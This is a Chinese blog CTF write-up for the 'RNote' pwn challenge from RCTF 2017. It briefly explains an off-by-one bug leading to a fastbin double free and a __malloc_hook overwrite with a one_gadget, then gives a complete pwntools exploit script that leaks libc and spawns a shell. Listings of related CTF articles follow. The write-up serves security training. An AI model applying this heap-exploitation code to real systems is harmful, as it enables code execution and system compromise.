RNote XCTF 3rd-RCTF-2017 攻防世界

最新推荐文章于 2023-02-07 11:37:59 发布
最新推荐文章于 2023-02-07 11:37:59 发布
阅读量699 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/90744253
版权

 这个题 emmm   利用 off by one  然后就是double free  然后 写到 malloc_hook 就ok

不过这个题 我一开始出了一个问题 在 malloc_hook  里面我只是找到了  7f 

然后我用了 0x30的堆块  然后不行 malloc的直接在堆块了 没有到我们想要的地方   只能又重新规划    然后 one_gadget   一把梭就好了 

存在  off by one 的地方

 

 基本的泄露基址的方法   很入门的一道题

#!/usr/bin/env python2
from pwn import *
context.log_level = 0
io=process("./RNote")
libc=ELF("./libc-2.23.so")
def add(size,title,content):
	io.sendline("1")
	io.recvuntil("Please input the note size: ")
	io.sendline(str(size))
	io.recvuntil("Please input the title: ")
	io.send(title)
	io.recvuntil("Please input the content: ")
	io.send(content)

def dele(index):
	io.sendline("2")
	io.recvuntil("Which Note do you want to delete: ")
	io.sendline(str(index))

def show(index):
	io.sendline("3")
	io.recvuntil("Which Note do you want to show: ")
	io.sendline(str(index))

if __name__ =="__main__":
	add(0x20,'a'*0xf+'\n','a'*0x20)#0
	add(0x20,'b'*0xf+'\n','b'*0x20)#1
	add(0x20,'c'*0xf+'\n','c'*0x20)#2
	add(0x80,'d'*0xf+'\n','d'*0x20)#3
	add(0x60,'A'*0xf+'\n','e'*0x20)#4 30
	dele(3)
	add(0x80,'d'*0xf+'\n','\n')#3
	show(3)
	io.recvuntil("note content: ")
	main_arena=u64(io.recv()[8:14].ljust(8,'\x00'))-88
	libc_base_addr=main_arena-0x3C4B20
	print hex(libc_base_addr)
	system_addr=libc_base_addr+libc.sym['system']
	add(0x20,'D'*16+'\x30\n','e'*0x20)#5
	add(0x60,'A'*0xf+'\n','e'*0x20)#6
	add(0x60,'A'*0xf+'\n','e'*0x20)#7
	dele(4)
	dele(7)
	dele(5)
	# dele(6)#double free
	# #gdb.attach(io)
	fake_chunk_addr=main_arena-0x33
	sh_bin=libc.search("/bin/sh").next()+libc_base_addr
	print "fake_chunk_addr",hex(fake_chunk_addr)
	one = libc_base_addr + 0xf1147
	payload=0x13 * 'a' + p64(one)
	
	add(0x60,'e'*0xf+'\n',p64(fake_chunk_addr))
	# #gdb.attach(io)
	add(0x60,'s'*0xf+'\n','s'*0x20)
	add(0x60,'s'*0xf+'\n','s'*0x20)
	
	#gdb.attach(io,'b *0x7ffff7a52390')
	# #gdb.attach(io)
	add(0x60,'F'*0xf+'\n',payload)
	# #gdb.attach(io)
	io.recv()
	io.sendline('1')
	io.recv()
	io.sendline('10')
	io.interactive()

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-HW-pipeline附件
11-09
附件
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
攻防世界】Recho
weixin_43960998的博客
03-28 669
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
攻防世界进阶题Recho——知识点缝合怪
weixin_48066554的博客
09-20 829
攻防世界进阶题Recho——知识点缝合怪 文章目录攻防世界进阶题Recho——知识点缝合怪引入初分析1、checksec2、主函数结构3、栈结构4、特殊字符串解题过程1、gadget搜集2、GOT表详情3、函数参数说明exp(详细注释) 引入 好久没有做pwn题了,手生的厉害,做道简单题练练手好了 这道题其实难度不高,属于那种开门见山把漏洞点抛出任君采撷的题,但是由于涉及的知识点较多,在ROP链构造时需要有清晰的思路,对于我这样的小白来说自然是再好不过的练习题。 初分析 1、checksec 题目拿到手上,
攻防世界--Recho
qq_73149934的博客
02-07 206
攻防世界--Recho
XCTF 3rd-BCTF-2017——100levels
05-08 360
64位程序,没开canary,但开了PIE  #爆破 #vsyscall 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 5 set(); 6 put_logo(); 7 while ( 1 ) ...
[XCTF-pwn] 21_xctf-3rd-bctf-2017_1000levels
weixin_52640415的博客
03-08 208
1000级的简版100级。 程序两个函数一个是给个提示,这时候会把system放到栈里(但没有输出),第二个是进行一个100层递归回答问题。 漏洞: hint函数在if前面将system放到栈里,这样system在栈里有残留 第2个漏洞是read有溢出,而且很长。 问题是这个题开启了随机化,这样题目加载地址、栈地址、libc加载地址都是随机的 第1个的漏洞就,第2个的漏洞是 ...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
攻防世界 Pwn Recho
MrTreebook的博客
12-18 644
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
XCTF 3rd-RCTF-2017 Recho
qq_41071646的博客
07-16 816
最近感觉事情比较忙 以前就是做了一些题 就总结一下 现在 是 如果题目一下就看出来了 就再也不会写博客了 估计以后博客会 越写越少 然后 这个题目 参考链接 https://www.xctf.org.cn/library/details/e0d90ad9d0609320fd6743706135a80913d27b8d/ 主程序 主要是有几点没有想到 第一点就是没有想到怎么退出循环...
攻防世界(pwn)Recho(XCTF 3rd-RCTF-2017) writeup
xidoo1234的博客
02-27 1242
深感本题扩充了本人的知识面,遂作文记录下来
rctf2018_rnote4(堆与dl_load相结合)
seaaseesa的博客
06-10 568
rctf2018_rnote4 首先,检查一下程序的保护机制,无RELRO保护,无PIE保护 然后,我们用IDA分析一下,edit功能里可以自由控制长度,存在溢出 整个程序没有任何的输出 通过堆溢出,我们可以轻松构造任意地址写,但是没有输出函数,不能泄露地址,由此,想到了一个巧妙的方法,这个程序没有开启RELRO保护,那么其dt_strtab是可以修改的 那么,我们只要在这里,将strtab表指针改成我们伪造的字符串表,然后,将某函数的got修改为其对应的plt load地址,当接下来
MyDriver2-397 XCTF 3rd-RCTF-2017 (windows 驱动题)
qq_41071646的博客
05-16 1072
这个题 是驱动题 幸亏 自己以前学过驱动 所以对这个东西有所了解 其实这个驱动一开始我看的也很懵 不知道是干啥的 然后我先去看了看 卸载函数 看看他里面有什么东西 然后发现了这个 然后我就get 他的点了 开/关内存保护 然后 把正确的地址写回去 这个我以前研究过 一段时间的驱动 然后顺着这个路线 我 就大概懂了这个程序的逻辑 这个程序是用inline hook...
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1634
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
xctf(misc)-部分wp
i_am_not_hacker的博客
08-13 441
ext3 ext3是第三代扩展文件系统,是一个日志文件系统,常用于Linux操作系统。它是很多Linux发行版的默认文件系统。 下载附件后,得到一个linux文件,拖进kali里面,使用mount命令挂载(Linux中mount命令用于挂载Linux系统外的文件) Linux下mount命令与mnt目录详解 挂载后我们使用命令 strings linux | grep flag 来查看字符串,...
攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1687
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
XCTF WEB upload(RCTF-2015)
A_dmin的博客
12-12 946
XCTF WEB upload(RCTF-2015) 两百多天未解决的问题了,,,, 打开题目,发现需要登录注册,,注册登陆之后需要我们进行文件上传: 估摸着登录页面与注册页面没有漏洞,,,,,毕竟题目提示就是让我们上传,, 上传的套路都试过,只能上传jpg图片,,,,其他一律不行,,,而且不知道路径为多少,,, jpg图片上传成功之后有个提示: 奇怪的uid,,,,,数据库编号之类的,,,...
攻防世界)(pwn)welpwn
PLpa的博客
07-18 2693
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
攻防世界upload1
最新发布
07-28
- *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值